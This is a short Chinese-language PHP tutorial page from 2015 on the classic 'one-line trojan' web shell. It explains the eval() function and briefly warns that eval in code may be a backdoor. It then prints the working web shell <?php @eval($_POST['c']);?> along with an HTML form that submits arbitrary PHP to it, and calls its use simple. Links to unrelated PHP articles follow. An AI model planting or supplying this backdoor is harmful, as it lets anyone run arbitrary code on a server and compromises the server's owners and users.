php eval函數(shù)一句話木馬代碼
更新時間:2015年05月21日 11:03:25 投稿:hebedich
這個是php常見的一句話木馬的源碼,通過post木馬程序來實現(xiàn)木馬的植入,eval()函數(shù)把字符串按照PHP代碼來計算。該字符串必須是合法的PHP代碼,且必須以分號結(jié)尾。如果沒有在代碼字符串中調(diào)用return語句,則返回NULL。如果代碼中存在解析錯誤,則eval()函數(shù)返回false。
eval可以用來執(zhí)行任何其他php代碼,所以對于代碼里發(fā)現(xiàn)了eval函數(shù)一定要小心,可能是木馬
就這一句話害死人,這樣任何人都可以post任何文件上來,所以要做好防范
<?php @eval($_POST['c']);?>
使用方法也很簡單,本地提交文件指向提交文件,里面的php代碼就會被執(zhí)行
<html> <body> <form action="a.php" method="post"> <input type="text" name="c" value="phpinfo();"> <input type="submit" value="submit"> </form> </body> </html>
以上所述就是本文的全部內(nèi)容了,希望大家能夠喜歡。
相關文章
PHP實現(xiàn)通過Luhn算法校驗信用卡卡號是否有效
這篇文章主要介紹了PHP實現(xiàn)通過Luhn算法校驗信用卡卡號是否有效,實例分析了php實現(xiàn)Luhn算法及相關應用技巧,具有一定參考借鑒價值,需要的朋友可以參考下2015-03-03
php實現(xiàn)執(zhí)行某一操作時彈出確認、取消對話框
當執(zhí)行某一操作比如確認或者取消時如何彈出對話框,針對這個需求,下面使用php來實現(xiàn)下,感興趣的朋友不要錯過2013-12-12
CentOS7系統(tǒng)搭建LAMP及更新PHP版本操作詳解
這篇文章主要介紹了CentOS7系統(tǒng)搭建LAMP及更新PHP版本操作,總結(jié)分析了CentOS7系統(tǒng)搭建LAMP及更新PHP版本操作相關原理、步驟、操作命令與注意事項,需要的朋友可以參考下2020-03-03
php中ob(Output Buffer 輸出緩沖)函數(shù)使用方法
php中ob(Output Buffer 輸出緩沖)函數(shù)使用方法...2007-07-07

